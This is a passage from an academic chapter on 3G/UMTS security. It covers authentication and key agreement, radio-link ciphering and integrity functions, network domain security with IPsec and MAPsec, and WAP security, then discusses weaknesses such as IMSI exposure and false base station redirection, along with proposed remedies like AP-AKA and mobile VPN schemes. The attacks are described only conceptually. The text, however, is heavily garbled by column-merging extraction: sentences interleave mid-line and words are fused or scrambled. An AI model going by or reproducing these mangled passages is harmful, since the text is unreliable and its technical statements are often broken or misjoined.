• Visibility and configurability of security temporary identity. Additionally, any signaling or
(V) user data that might reveal the user’s identity are
ciphered on the radio access link.
nEtwork AccEss sEcurIty Authentication and key Agreement
Network access security is a key component in Authentication and key agreement mechanism
the 3G security architecture. This class deals achieves mutual authentication between the mobile
with the set of security mechanisms that provide user and the SN showing knowledge of a secret
users with secure access to 3G services, as well key (K), as well derives ciphering and integrity
as protect against attacks on the radio interface. keys. The authentication method is composed of
Suchmechanismsinclude:user )1( identity
- confi
a challenge/response protocol (see Figure 3) and
dentiality, (2) authentication and key agreement, (3) was chosen in such a way as to achieve maximum
dataconfidentiality,andintegrity )4 ( protection of the GSM/GPRS security archi-
compatibility with
signaling messages. Network access security takes tecture facilitating the migration from GSM/GPRS
place independently in each service domain. to UMTS. Furthermore, the user service identity
module (USIM) (3GPP TS 22.100, 2001) and the HE
User Identity Confidentiality keeptrackofcounters MS
and SQN HE, respec-
SQN
tively, to support the network authentication. The
Useridentityconfidentialityallows - sequence
theidentifica numberHESQN is an individual counter
tion of a user on the radio access link by means for each user, while the
MS
SQN the high-
denotes
of a temporary mobile subscriber identity (TMSI). est sequence number that the USIM has accepted.
Thisimpliesthatconfidentialityofthe Whenever
useridentitythe SQN HE
is not in the correct range,
is protected almost always against passive eaves- the mobile station decides that a synchronization
droppers. Initial registration is an exceptional case failure has occurred in the HE and consequently
where a temporary identity cannot be used, since initiates a resynchronization to the HE.
the network does not yet know the permanent Upon receipt of a request from the VLR/SGSN,
identity of the user. the HE authentication center (HE/AuC) forwards
The allocated temporary identity is transferred an ordered array of authentication vectors (AV)
to the user once the encryption is turned on. A to the VLR/SGSN. Each AV, which is used in
TMSI in the circuit switched (CS) domain or P- the authentication and key agreement procedure

Figure 3. 3G authentication and key agreement
Figure 4. Generation of authentication vectors

SQ
GenerateN
Generate RAND
SQ N
RAND
AMF
f1 f2 f3 f4 f5
MAC XRES CK IK AK
AUTN :=SQN ⊕ AK ||AMF||MAC
AV:=RA ND||XRES|| CK||IK|| AUTN
between the VLR/SGSN and the USIM consists of • The Message Authentication Code (MAC)
a random number (RAND), an expected response = f1k (SQN ||1 RAND || AMF), where f1 is
(XRES), a cipher key (CK), an integrity key (IK), a message authentication function and the
and an authentication token (AUTN). authentication and key management field
Figure 4 shows an AV generation by the HE/ AMF)
( isusedtofinetunetheperformance
AuC. The HE/AuC starts with generating a fresh or bring a mew authentication key stored in
sequencenumberSQN) ( which
, provestotheuser the USIM into use.
that the generated AV has not been used before and • The expected response XRES = f2k (RAND)
an unpredictable challenge RAND. Then, using where f2 is a (possibly truncated) message
the secret key (K) it computes: authentication function.
• The cipher key CK = f3k (RAND),

• the integrity key IK = f4k (RAND), SQN = (SQN ⊕ AK) ⊕ AK.

• and the anonymity key AK = f5k (RAND) Then, it computes XMAC = f1k (SQN || RAND
where f3, f4, and f5 are key generating func- || AMF) and checks whether the received AUTN
tions. andtheretrievedSQNvalueswere- indeedgener
• Finally, the HE/AuC assembles the authen- ated in AuC (3GPP TS 33.102, 2002). If so, the
tication token AUTN = SQN ⊕2 AK || AMF USIM computes the user response to the challange
|| MAC RES= f2k (RAND), and triggers the mobile station
(MS) to send back a user authentication response.
It has to be noted that the authentication and key Afterwards, the USIM computes the CK,
generation functions f1, f2, f3, f4, and f5, and the CK = f3k (RAND),
consequent AV computation follow the one-way and the IK,
property. This means that if the output is known IK = f4k (RAND).
there exists no efficient algorithm to deduce any compares the received RES
The VLR/SGSN
input that would produce the output. Although with the XRES field of the AV. If they match, it
the f1-f5 functions are based on the same basic considers that the authentication and key agree-
algorithm, they differ from each other in a fun- ment exchange has been successfully completed.
damental way in order to be impossible to deduce Finally, the USIM and the VLR/SGSN transfer
any information about the output of one function the established encryption and integrity protec-
from the output of the others. Since they are used in tion keys (CK and IK) to the mobile equipment
the AuC and in the USIM, which are controlled by and the RNC that perform ciphering and integrity
the home operator, the selection of the algorithms functions.
f1( f5- )isinprincipaloperatorspecific.However,
an example algorithm set has been proposed called Data Confidentiality
MILENAGE (3GPP TS 35.205, 2001).
When the VLR/SGSN initiates an authentica- Once the user and the network have authenticated
tion and key agreement procedure, it selects the each other, they may begin secure communication.
next AV from the ordered array and forwards the As described previously, a cipher key is shared
parameters RAND and AUTN to the user. The between the core network and the terminal after
USIM using also the secret key (K) computes a successful authentication event. User and signal-
the AK, ing data sent over the radio interface are subject to
AK=f5k(RAND), ciphering using the function (f8). The encryption/
andretrievestheSQN, decryption process takes place in the MS and the
Figure5. Ciphering over the radio access link
COUNT-C DIRECTION COUNT-C DIRECTION
BEARER LENGTH BEARER LENGTH
CK f8 CK f8
KEYSTREAM KEYSTREAM
BLOCK BLOCK
PLAINTEXT CIPHERTEXT PLAINTEXT

BLOCK BLOCK BLOCK
Sender Receiver
UE or RNC RNC or UE

RNC on the network side. The f8 is a symmetric that MACs for two frames with identical content
synchronous stream cipher algorithm that is used are different, are a 32-bit value COUNT, a 32-bit
to encrypt frames of variable length. The main value FRESH, and an 1-bit value DIRECTION.
input to the f8 is a 128-bit secret cipher key CK. In the UMTS R99, the f9 is based on the Kasumi
Additional inputs, which are used to ensure that two algorithm (3GPP TR 33.908, 2000).
frames are encrypted using different keystreams
are a 32-bit value COUNT, a 5-bit value BEARER,
and a 1-bit value DIRECTION (see Figure 5). The nEtwork doMAIn sEcurIty
output is a sequence of bits (the “keystream”) of the
same length as the frame. The frame is encrypted Network domain security (NDS) features ensure
by XORing the data with the keystream. For UMTS that signaling exchanges within the UMTS core
R99, f8 is based on the Kasumi algorithm (3GPP as well as in the whole wireline network are pro-
TR 33.908, 2000). tected. Various protocols and interfaces are used
for the control plane signaling inside, and between
Integrity Protection of signaling core networks, such as the mobile application
Messages part (MAP) and the GPRS tunneling protocol
(GTP) protocols, and the Iu (IuPS, IuCS) and Iur
The radio interface in 3G mobile systems has also interfaces (3GPP TS 23.002, 2002). These will be
been designed to support integrity protection on protected by standard procedures based on the
the signaling channels. This enables the receiv- existingcryptographictechniques.Specifically,the
ing entity to be able to verify that the signaling IP-based protocols shall be protected at network
data have not been modified in an unauthorized level by means of IP security (IPsec) (Kent & At-
way since they were sent. Furthermore, it ensures kinson, 1998), while the realization of protection
that the origin of the received signaling data is for the signaling system 7 (SS7)-based protocols
indeed the one claimed. The integrity protection and the lu and Iur interfaces shall be accomplished
mechanism is not applied for the user plane due at the application layer. In the following, the NDS
to performance reasons. context for IP-based (3GPP TS 33.210, 2002) and
The function (f9) is used to authenticate the SS7-based (3GPP TS 33.200, 2002) protocols is
integrity and the origin of signaling data between presented. Moreover, the employment of tradi-
the MS and the RNC in UMTS. It computes a tional security technologies, originally designed
32-bit MAC (see Figure 6), which is appended forfixednetworking,suchasfirewallsandstatic
to the frame and is checked by the receiver. The virtual private networks (VPNs) are examined.
main inputs to the algorithm are a 128-bit secret The application of these technologies safeguards
IK and the variable-length frame content MES- the UMTS core network from external attacks and
SAGE. Additional inputs, which are used to ensure protects users’ data when are conveyed over the
public Internet.
Figure6.DerivationofMAConasignalingmessage
COUNT-I DIRECTION COUNT-I DIRECTION
MESSAGE FRESH MESSAGE FRESH
IK f9 IK f9
MAC -I XMAC -I
Sender Receiver
UE or RNC RNC or UE

IP-based Protocol SEG in the receiving domain, which in turn uses

IPsectopassthedatatoitsfinaldestination(pa
The UMTS network domain control plane is (a) in Figure 7). The end-to-end scheme implies
sectioned into security domains, which typically that an IPsec SA is established between the two
coincide with the operator borders. Security gate- NEs (path (b) in Figure 7). This scheme can also
ways (SEGs) are entities at the borders of the IP be applied in case the two parties belong to the
security domains used for securing native IP-based same security domain.
protocols. It is noted that NDS does not extend to Node authentication can be accomplished us-
theuserplane,whichmeansthatpacket ingows
fl either
over
pre-shared symmetric keys or public
the Gi (3GPP TS 23.002, 2002) interface will not keys (Harkins & Carrel, 1998). Using pre-shared
be protected by the SEGs. The key management symmetric keys means that the KACs or the NEs
functionality is logically separate from the SEG. do not have to perform public key operations as
Key administration centers (KACs) negotiate the well as there is no need for establishing a public
IPsec security associations (SAs) by using the keyinfrastructure.TheIPsecisconfiguredeither
Internet key exchange (IKE) protocol (Harkins in transport mode or in tunnel mode (Kent & At-
& Carrel, 1998) in a client mode, on behalf of the kinson, 1998). Whenever at least one end point is a
network entities (NEs) and the SEGs. The KACs gateway then the tunnel mode suits better. Finally,
also distribute SAs parameters to the NEs or the the IPsec protocol shall always be encapsulation
SEGs through standard interfaces. In Figure 7 the security payload (ESP) (Kent & Atkinson, 1998),
UMTS NDS architecture for IP-based protocols giventhatitcanprovideconfidentiality - andint
is depicted. rity protection as well.
TosecuretheIPtrafficbetweentwoNEs,either
a hop-by-hop or an end-to-end scheme may be ss7-based Protocols
applied.ThefirstrequiresthattheoriginatingNE
establishes an IPsec tunnel to the appropriate SEG NDS for SS7-based protocols is mainly found at
in the same security domain and forwards the data theapplicationlayer.Specifically,incasethatth
to it. The SEG terminates this tunnel and sends the transport relies on SS7 or on a combination of
data through another IPsec tunnel to the receiving SS7 and IP, then security shall be provided at the
network. The second tunnel is terminated by the application layer. On the other hand, whenever the
Figure 7. NDS architecture for IP-based protocols

Figure 8. NDS architecture for SS7 and mixed SS7/IP-based protocols
transport is based only on IP, then security may to various external threats. Moreover, inter-network
be provided either at the network layer exclusively communications are based on the public Internet,
using IPsec or in a combination of the application whichenablesIPspoofingtoanymaliciousthird
and network layer. For signaling protection at the party who gets access to it. In order to defeat
application layer the necessary SAs will be network- these vulnerable points, the mobile operators can
wide and they are negotiated by KAC similarly to use two complementary technologies: firewalls
the IP-based architecture (see Figure 8). End-to-end and VPNs (Gleeson, Lin, Heinanen, Armitage, &
protected signaling will be indistinguishable to Malis, 2000).
unprotectedsignalingtraffictoallparties, Firewallsexcept
can be characterized as a technology
for the sending and receiving sides. providing a set of mechanisms to enforce a security
It is worth noting that in Rel-4 the only protocol policy on data from and to a corporate network.
that is to be protected is the MAP. The complete They are established at the borders of the core
set of enhancements and extensions that facilitate networkallowingtrafficoriginatingfromspecific
the MAP security is termed MAPsec (3GPP TS foreign IP addresses. Thus, firewalls protect the
33.200, 2002). The MAPsec covers the security UMTS backbone from unauthorized penetration.
management procedures, as well as the security Furthermore,applicationfirewallspreventdire
of the transport protocol including data integrity, access through the use of proxies for services,
data origin authentication, anti-reply protection, which analyze application commands, perform
andconfidentiality.Finally,forIKEadaptation a and keeps logs.
authentication,
specificDomainofInterpretationisrequired. Since firewalls do not provide privacy and
confidentiality, VPNs have to complement them
traditional network security features to protect data in transit. VPN establishes a secure
tunnel between two points, encapsulates and en-
Besides the security features that are included in crypts data, and authenticates and authorizes user
the 3G security architecture, the mobile network access of the corporate resources on the network.
operators can apply traditional security technolo- Thus, they extend dedicated connections between
gies used in terrestrial networking to safeguard the remote branches or remote access to mobile us-
UMTS core network as well as the inter-network ers, over a shared infrastructure. Implementing a
communications. User data in the UMTS backbone VPNmakessecurityissuessuchasconfidentiality,
network are conveyed in clear-text exposing them integrity, and authentication paramount. There is a

two-foldbenefitthatarisesfromVPNdeployment: share a secret (e.g., a PIN). The user gets access

the low cost and security. to the USIM only if he/she proves knowledge of
The border gateway is an element that resides at the secret. Furthermore, access to a terminal or
the border of the UMTS core network and provides to other user equipment can be restricted to an
theappropriatelevelofsecurity - policy e.
( g.,fireUSIM. To this end, the USIM and the
authorized
wall)as , wellasmaintainingstaticpre- configured
terminal must also share a secret. If a USIM fails
security tunnels (e.g., IPsec tunnels) granting VPN to prove its knowledge of the secret then access
services to specific peers. It serves as to a gateway
the terminal is denied.
between the PS domain and an external IP network
that is used to provide connectivity with other PS Application domain security
domains located in other core networks.
Application domain security (3GPP TS 33.102,
2002) deals with secure messaging between the
usEr And APPlIcAtIon doMAIn MS and the SN or the SP over the network with a
sEcurIty fEAturEs level of security chosen by the network operator
or the application provider. A remote application
user domain security should authenticate a user before allowing him/her
to utilize the application services and it could also
User domain security (3GPP TS 33.102, 2002) provideforapplication-leveldataconfidential
ensures secure access to the MS. It is based on a Application-level security mechanisms are needed
physical device called UMTS integrated circuit because the lower layers’ functionality may not
card (UICC), which can be easily inserted and guarantee end-to-end security provision. The lack
removed from terminal equipment, containing of end-to-end security could be envisioned when
security applications such as the USIM (3GPP TS for instance the remote party is accessible through
The
.) 1 02 , 1 2. USIMrepresentsandidentifies the Internet.
a user and his/her association to an HE. It is re- USIM application toolkit (3GPP TS 33.111,
sponsible for performing subscriber and network 2001) provides the capability for operators or third
authentication, as well as key agreement when 3G party providers to create applications that are resi-
services are accessed. It may also contain a copy dent on the USIM. To assure secure transactions
oftheuser’sprofile. between the MS and the SN or the service provider
The USIM access is restricted to an authorized (SP), a number of basic security mechanisms such
user or to a number of authorized users. To ac- as entity authentication, message authentication,
complish this feature, the user and the USIM must replaydetection,sequenceintegrity,confidential
assurance,andproofofreceipthavebeenspecified
and integrated in the USIM Application Toolkit.
Figure9a. WAP 1.2.1 architecture Figure9b. WAP 2.0 architecture
wAP device web server wAP device web server

wAP gateway
wAE wAE wAE wAE
wAP gateway
wsP wsP HttP HttP
HttP HttP tls security channel
wtP wtls security wtP tls security tls tls
channel channel
wtls wtls tls tls tcP* tcP* tcP tcP
wdP wdP tcP tcP IP IP IP IP

bearer bearer IP IP wired
wireless wireless wired
HttP: HyperText Transfer Protocol wAP: Wireless Application Protocol

IP: Internet Protocol wdP: Wireless Datagram Protocol HttP: HyperText Transfer Protocol tls: Transport Layer Security
tcP: Transmission Control Protocol wsP: Wireless Session Protocol IP: Internet Protocol wAE: Wireless Application Environment
tls: Transport Layer Security wtls: Wireless Transport Layer Security tcP: Transmission Control Protocol wAP: Wireless Application Protocol
wAE: Wireless Application Environment wtP: Wireless Transport Protocol tcP*: Wireless profiled TCP

Wireless Application Protocol (WAP) is a suite (2) indication of network wide encryption; and (3)
of standards for delivery and presentation of In- indication of the level of security (e.g., when a user
ternet services on wireless terminals, taking into moves from 3G to 2G).
account the limited bandwidth of mobile networks Configurability enables the mobile user and
as well as the limited processing capabilities of the HE to configure whether a service provision
mobile devices. It separates the network in two should depend on the activation of certain security
domains (i.e., the wireless and the Internet domain) features. A service can only be used when all the
and introduces a WAP gateway that translates the relevant security features are in operation. The
protocols used in each domain. The WAP archi- configurabilityfeaturesthataresuggestedincl
tecture has been standardized in two releases (ver. (1) enabling/disabling user-USIM authentication for
1.2.1 and ver. 2.0) (Wireless Application Forum, certain services; (2) accepting/rejecting incoming
n.d.). non-ciphered calls; (3) setting up or not setting up
In WAP 1.2.1 (see Figure 9a), security is ap- non-ciphered calls; and (4) accepting/rejecting the
plied by using the wireless transport layer security use of certain ciphering algorithms.
(WTLS) protocol (wireless application forum, n.d.)
over the wireless domain and the transport layer network-wide user data
security (TLS) protocol over the Internet domain. Confidentiality
WTLS, which is based on TLS, provides peers
authentication, data integrity, data privacy, and Network-wide confidentiality is an option that
protection against denial-of-service in an optimized provides a protected mode of transmission of user
way for use over narrow-band communication data across the entire network. It protects data
channels. However, WAP 1.2.1 does not support against eavesdropping on every link within the
end-to-end security, since the conveyed data are network and not only on the vulnerable radio links.
protected by two separate security channels (i.e., Whenevernetwork-wideconfidentialityisapplied,
WTLS security channel and TLS security chan- accesslinkconfidentialityonuserdatabetweent
nel). MS and the RNC is disabled to avoid replication.
On the other hand, WAP 2.0 (see Figure 9b) However,accesslinkconfidentialityforsignaling
introduces the Internet protocol stack into the informationaswellasuseridentityconfidential
WAP environment. It allows a range of different are retained to facilitate the establishment of the
gateways, which enable conversion between the encryption process. In Figure 10, the network-wide
two protocol stacks anywhere from the top to the encryption deployment is depicted.
bottom of the stack. A TCP-level gateway allows Network-wide confidentiality uses a syn-
for two versions of TCP, one for the wired and chronous stream cipher algorithm similar to that
another for the wireless network domain. On the employed in the access link encryption. Initially,
top of the TCP layer, TLS can establish a secure a data channel is established between the com-
channel all the way from the MS to the remote municating peers indicating also the intention
server.Thus,theavailabilityofawireless profile encryption. VLRa and VLRb
for network-wide
for TLS enables end-to-end security allowing exchange cipher keys (Ka and Kb) for users a and
interoperability for secure transactions. b, respectively, using cross boundaries signaling
protection, and then, pass them to the MSs over
Security Visibility and Configurability protected signaling channels. When each MS has
received the other party’s key, the end-to-end
Although the security measures provided by the session key, Ks, is calculated as a function of Ka
SN should be transparent to the end user, visibility and Kb. Alternatively, VLRs can mutually agree
of the security operations as well as the supported on the Ks using an appropriate key agreement
security features should be provided. This may in- protocol. Both key management schemes satisfy
clude: (1) indication of access network encryption; the lawful interception requirement, since Ks can
be generated by the VLRs.

Figure 10. Network-wide encryption deployment
sEcurIty wEAknEssEs TS 33.102, 2002). This may lead an active attacker

to pretend to be a new SN to which the user has to
The analyzed 3G security architecture provides reveal his/her permanent identity. In both cases, the
advanced security services and addresses many IMSI that represents the permanent user identity
of the security concerns that have been listed in is conveyed in clear-text on the radio interface,
the context of next generation mobile networks. violatinguseridentityconfidentiality.
However, there are some critical points that need Another critical point is that the users may
further elaboration and improvements. In the fol- be identified by means of the IMSI in signaling
lowing,theidentifiedsecurityweaknesses oftheG3 in the wireline path. For example,
conversations
security architecture, which might cause network the SN/VLR may use the IMSI to request the
andservicevulnerability,arebrieflypresented. authentication data for a single user from his/her
As mentioned previously, the mobile user HE. Thus, user identity confidentiality and user
identity and location is valuable information that location privacy rely on the security of the wireline
requires protection. A possible weakness in the 3G signaling connections. NDS features protect signal-
security architecture is the backup procedure for ing exchange in the wireline network architecture
TMSI reallocation (3GPP TS 24.008, 2002). Spe- with IP and SS7 technologies, but these features
cifically,whenevertheSN/ VLRcannotassociate are considered for the later versions of the UMTS
the TMSI with the international mobile subscribers standardizationprocess,leavingthefirstone(R9) 9
identity (IMSI) because of TMSI corruption or unprotected.
database failure, the VLR should request the user The authentication and key agreement proce-
to identify himself by means of IMSI on the radio dure ofUMTSpresentstwocriticalsecurityaws fl
path. Furthermore, when the user roams and the presentedinZhangandFangThe . )05 2 ( firstone
new SN/VLRn cannot contact the previous (old) allowsanadversarytoredirectusertrafficfromon
VLRo or cannot retrieve the user identity; the network to another. This can be achieved because
SN/VLRn should also request the user to identify theuseri. ( e.,usingthesequencenumbers,SQN)
himself by means of IMSI on the radio path (3GPP can only verify whether an authentication vector

was generated by the HE. On the other hand, he/she because of the static configuration of firewalls
cannot determine if an authentication vector was may potentially lead to discontinuity of service
requested by the SN, since the authentication vector connectivity for the mobile user. Moreover, the
could have been requested by any SN. Thus, the firewalls security value is limited because th
adversary owing a false base/mobile station device allow direct connection to ports and cannot dis-
(i.e., a device that emulates a base station and a tinguish services.
mobile station) can impersonate as a genuine base Similarlytofirewalls,theVPNtechnologyfails
station and entices a legitimate user to camp on to provide the necessary exibility fl required by
the radio channels of the false base station. The typical mobile users. Currently, VPNs for UMTS
adversary can also impersonate as a legitimate subscribers are established in a static manner
mobile station and establishes connection with a between the border gateway of a UMTS network
genuine base station. This fact allows the adversary and a remote security gateway of a corporate
to relay messages in between a legitimate mobile private network. This fact allows the realization
station and a genuine base station realizing the of VPNs only between a security gateway of a
redirection attack. This attack represents a real large organization and a mobile operator, when
threat since the security levels provided by different a considerable amount of traffic requires - protec
networks are not always the same. In addition, it tion. Thus, this scheme can provide VPN services
could cause billing problems as the service rates neither to individual mobile users that may require
offered by different networks are not always the on demand VPN establishment, nor to enterprise
same, either. users that may roam internationally. In addition,
Thesecondsecurityaw fl thatisrelated static toVPNs
thehavetobereconfiguredeverytimethe
UMTS authentication (Zhang & Fang, 2005) al- VPN topology or VPN parameters change.
lows an adversary to use the authentication vec- On the other hand, if a mobile user uses the
tors corrupted from one network to impersonate WAP architecture (ver. 1.2.1), data privacy is not
other networks. When a network is corrupted, an guaranteed. Although encryption is used, the WAP
adversary could forge an authentication data request gateway constitutes a security hole since inside
from the corrupted network to obtain authentica- the gateway data are transmitted un-encrypted.
tion vectors for any user, independent of the actual WTLS is only used between the mobile device
location of the user. Then, the adversary could use and the gateway, while TLS can be used between
the obtained authentication vectors to impersonate the gateway and the Web server. From a security
uncorrupted networks and to mount false base sta- point of view, the gateway should be considered
tion attack against legitimate users. Therefore, the as an entity-in-the-middle. This means that
corruption of one network may jeopardize the entire data exchanged may be available to people with
system. For this reason, it is critical that security privileged access to the WAP gateway and thus,
measures are in place in every network. the privacy of the data depends on the gateway’s
The application of firewalls in G3 systems internal security policy.
presents some weaknesses since they were origi- WAP 2.0 does address the “gap” in security
nallyconceivedtoaddresssecurityissues caused byfor fixed translation at the WAP gateway
protocol
networks. Firewalls attempt to protect the clear- of the previous version (ver. 1.2.1). However, the
text transmitted data in the UMTS backbone from mobile phone would have to use an IP protocol
external attacks, but they are inadequate against stack at the expense of larger latency and band-
attacks that originate from other mobile network width consumption. Although TLS can be used
malicious subscribers, as well as from network to secure the communication of any application,
operator personnel or any other third party that it must be integrated into the application and thus,
gets access to the UMTS core network. Mobility to a large extent it is used for Web-based applica-
may imply roaming between networks and operations. Interaction with the end user is needed, for
tors possibly changing the source address, which example, to check with whom a secure session has
0
been established or to explicitly request the client porary identities will reside at the SN (TMSIALT),
to authenticate with the server. TLS is generally and the second one at the home network of the
a resource consuming protocol for deployment mobile user (TMSIHE). When the VLR of the SN
in mobile devices with limited processing capa- fail to page a mobile user using the current TMSI,
bilities and low bandwidth/high latency wireless it can try to page him/her using the alternative
networks. Moreover, the operation overhead may temporary identity (TMSIALT), which also resides
be increased by complex key-exchange procedures in the VLR. In case of a VLR database failure or a
in case the protected service contains cross-refer- corruption of the temporary identities (i.e., TMSI
ences to other services. and TMSIALT) that resides in the VLR, the VLR
Finally, the network-wide encryption may also requests the temporary identity (i.e., TMSIHE) from
encounter problems when transcoding is used. the home network by which it can page the mobile
Voice calls may need to be transcoded when they user. This identity resides in the user’s home net-
cross network borders, meaning that voice data work in order to avoid a possible corruption after
may have to undergo change such as bit-rate change a database (VLR) failure. In case that none of the
or some other transformation. It is not possible to TMSI is valid or all of them are corrupted, the user
apply such transformation on an encrypted signal, is not attached to the network.
which implies that the signal has to be decrypted Both the additional temporary identities (i.e.,
before transcoding. Furthermore, the network-wide TMSIALT and TMSIHE) derive from the current
confidentiality lacks exibility fl and
- it
TMSI.is not ap consists of four octets and its
The latter
plicable to all types of service in different mobile generation procedure is chosen by the mobile opera-
scenarios. Specifically, it is limited to tor.protecting
However, some general guidelines are applied
the communication between mobile subscribers. in all implementations in order to avoid double al-
location of TMSIs, after a restart of the allocating
node (i.e., VLR or SGSN). For this reason, some
currEnt rEsEArcH on uMts part of the TMSI may be related to the time when
sEcurIty it was allocated or contained a bit field, which is
changed when the allocating node has recovered
The weak points of the UMTS security architecture from the restart. After the generation of a TMSI,
may lead to compromises of end users and network the allocating node applies two individual hash
security of the UMTS system. These compromises functions (i.e., HASHALT and HASHHE), which
may influence the system deployment and the produce the corresponding TMSIALT and TMSIHE,
users’ trend to utilize UMTS for the provision of respectively. Then, the allocating node forwards
advanced multimedia services, which realizes the the three temporary identities to the involved
concept of mobile Internet. In the following, the mobile user and the TMSIHE to its home network.
current research on the UMTS security and the In cases that the home and the SN are the same,
proposed enhancements that aim at improving the the TMSIHE can be stored in HLR, which is not
UMTSsecurityarchitecturearebrieflypresented affected by the reasons that corrupt the other
and analyzed. two temporary identities. Finally, each time that
the current TMSI is renewed, the two additional
Identity Confidentiality temporary identities change in order to eliminate
the possibility of an adversary to link them to the
permanent user’s identity.
To limit the exposure of the permanent identities
(IMSI) of mobile users over the vulnerable radio
interface, the additional usage of two complemen- Authentication and key Agreement
tary temporary identities for each mobile subscriber
that is attached to the network has been proposed To address the security issues involved with the
(Xenakis & Merakos, 2004b). One of these tem- authentication and key agreement procedure Zhang

and Fang (2005) have proposed an adaptive proto- user data security
col for mobile authentication and key agreement,
called AP-AKA. The proposed protocol can defeat Another weakness of the current UMTS security
the redirection attack and may drastically lower architecture that can be overcome is related to
the impact of network corruption. An overview of the lack of effective protection of user data in the
AP-AKA is shown in Figure 11. fixedpartoftheUMTSnetwork.Toaddressthis
The AP-AKA protocol retains the framework problem, two alternative security solutions, which
of the legacy authentication and key agreement, but are based on existing security technologies, can
eliminates the synchronization required between be used: (1) the application layer security, and (2)
themobilestationanditshomenetwork MS thei.
( establishment
e.SQN
, of mobile VPNs, dynamically,
andSQN HE). In AP-AKA, each mobile station and that satisfy users’ needs.
its home network share an authentication key K and Application layer security solutions integrate
three cryptographic algorithms F, G, and H, where security into applications at the level of end us-
F and H are MACs and G is a key generation func- ers. The most prominent protocol that provides
tion. In practice, the authentication key is usually security at this layer for the Internet technology
generated by the home network and programmed is the Secure Sockets Layer (SSL) protocol (Gupta
into the mobile station during service provisioning. & Gupta, 2001). SSL supports server authentica-
Unlike the legacy authentication and key agreement, tion using certificates, data confidentiality, a
the home network in AP-AKA does not maintain message integrity. Since SSL is relatively “heavy”
a dynamic state, for example, the counter, for each for implementations on mobile devices, which are
individual subscriber. The mobile station can verify characterized by limited processing capabilities,
whether an AV was indeed requested by a SN and a lightweight version of SSL named “KiloByte”
was not used before by the SN. The AP-AKA SSL (KSSL) has been proposed (Gupta & Gupta,
protocol specifies a sequence of six flows. Each 2001). This SSL implementation (KSSL) provides
flow defines a message type and format sent or an advantage by enabling mobile devices (UMTS
received by an entity. Depending on the execution MS) to communicate directly and securely with a
environment, entities have the flexibility of adap- considerable number of Internet Web servers that
tively selecting flows for execution, and thus the support SSL.
AP-AKA is called an adaptive protocol.
Figure 11. Overview of AP-AKA

An alternative approach to the previous solu- & Merakos, 2004a), (2) the network-wide (Xenakis
tions that employ security at the application layer & Merakos, 2006), and (3) the border-based (Xe-
pertains to these that employ security at the network nakis, Loukas, & Merakos 2006). These schemes
layer. The most prominent technique for provid- mainly differ in the position where the security
ing security at the network layer is IPsec (Kent functionality is placed within the UMTS network
& Atkinson, 1998). As a network layer security architecture (MS, RNC, and GGSN), and whether
mechanism, IPsec protects traffic on - a per
data con
in transit are ever in cleartext or available to
nection basis and thus, is independent from the be tapped by outsiders.
applications that run above it. In addition, IPsec The end-to-end security scheme integrates the
is used for implementation of VPNs (Gleeson et VPN functionality into the communicating peers,
al., 2000). An IPsec-based VPN is used for the whichnegotiateandapplysecurity. - Morespecifi
authentication and the authorization of user ac- cally, an MS and a remote security gateway (SG)
cess to corporate resources, the establishment of of a corporate private network establish a pair of
secure tunnels between the communicating parties IPsec SAs between them, which are extended over
and the encapsulation and protection of the data the entire multi-nature communication path, as
transmitted by the network. On-demand VPNs shown in Figure 12. Thus, sensitive data are secured
that are tailored to specific security as theyneeds
leave theare
originator site (MS or SG) and
especially useful for UMTS users, which require remain protected while they are conveyed over the
any-to-any connectivity in an ad hoc fashion. Re- radio interface, the GPRS backbone network, and
garding the deployment of VPNs over the UMTS the public Internet eliminating the possibilities of
infrastructure, three alternative security schemes being intercepted or to be altered by anyone.
have been proposed: (1) the end-to-end (Xenakis The deployed end-to-end VPN has no inter-
relation with the underlying network operation
Figure 12. The end-to-end security scheme

and the provided network connectivity. It operates the border-based (Xenakis et al., 2006) schemes
above the network layer and thus, the security integrate the VPN functionality into the UMTS net-
parameters, which are contained within the IPsec work infrastructure following a network-assisted
SA, are not affected by the MS movement. For this security model. In both schemes a MS initiates a
reason the MS may freely move within the UMTS VPN that is negotiated and established by the net-
coverage area maintaining network connectivity work infrastructure thus minimizing the impact to
and VPN service provision. The UMTS mobility end users and their devices. The network operators
management procedures keep track of the user provide the security aggregation facilities, which
location and therefore, the incoming packets are are shared among the network subscribers, as a
routed to the MS. On the other hand, the end-to- complementary service, granting-added value.
end security scheme is not compatible with the They have solid network management expertise
legal interception option or any other application and more resources to effectively create, deploy,
that requires access to the traversing data within and manage VPN services originating from mobile
the mobile network. The enforcement of network subscribers.
security policy, traditionally performed by border For the deployment of both security schemes
firewalls,isdevolvedtoendhosts,which (i.e.,establish
network-wide and border-based) the MS must
VPN overlays. Despite this, the borderbe firewalls
enhanced with a security client (SecC) and the
remaintoperformpacketfilteringandUMTS counteract
core network should incorporate a security
against denial of service attacks. server (SecS). The SecC is employed by the user
Contrary to the end-to-end security scheme, to request for VPN services and express his pref-
the network-wide (Xenakis & Merakos, 2006) and erences. It is a lightweight module that does not
Figure 13. The network-wide security scheme

Figure 14. The border-based security scheme
entail considerable processing and memory capa- tire network route between the originator and the
bilities and thus, it can be easily integrated in any recipient. In order to achieve VPN continuity as a
type of mobile device causing minor performance mobile user moves and roams, the standard UMTS
overhead. On the other side, the SecS establishes, mobility management procedures needs to be
controls, and manages VPNs between itself and enhanced. The enhancements include the transfer
remote SGs at corporate LANs on behalf of the of the related context (named as security context),
mobile users. The SecS comprises an IPsec imple- which contains the details of the deployed security
mentationmodifiedtoadapttotheclient- initiated
associations that pertain to the moving user, to the
VPN scheme and the security service provision new visited access point. This transfer enables
in a mobile UMTS environment. It can be readily the reconstruction of the security associations of
integrated in the existing network infrastructure the moving user to the new visited access point,
and thus, both schemes can be employed as add-on when the user connects to it, providing continu-
features of UMTS. ous VPN services from the end-user perspective.
The network-wide scheme (see Figure 13) The network-wide scheme is compatible with legal
integrates the SecS into the RNC of the UMTS interception; however, User Datagram Protocol
network infrastructure. This scheme provides (UDP) encapsulation is applied for Network Ad-
maximal security services to the communicating dress Translation (NAT) traversal. Finally, the
peers by employing the existing UMTS ciphering network security policy is enforced by the SGSN,
over the radio interface and extending a VPN over which incorporates the SecS.
the UMTS backbone and the public Internet. Thus, By placing the SecS in the GGSN, the border-
sensitive user data remains encrypted for the en- based VPN deployment scheme is realized (see

Figure 14). This scheme protects data conveyance AcknowlEdgMEnt

over the public Internet, which is a vulnerable
network segment. The user mobility is transparent Work supported by the project CASCADAS
to the VPN operation, as long as the user remains (IST-027807) funded by the FET Program of the
under the same network operator coverage and is European Commission.
served by the same GGSN. However, whenever
the mobile user roams to another GGSN, the ex-
isting security association cannot be used and a rEfErEncEs
new VPN should be established. The border-based
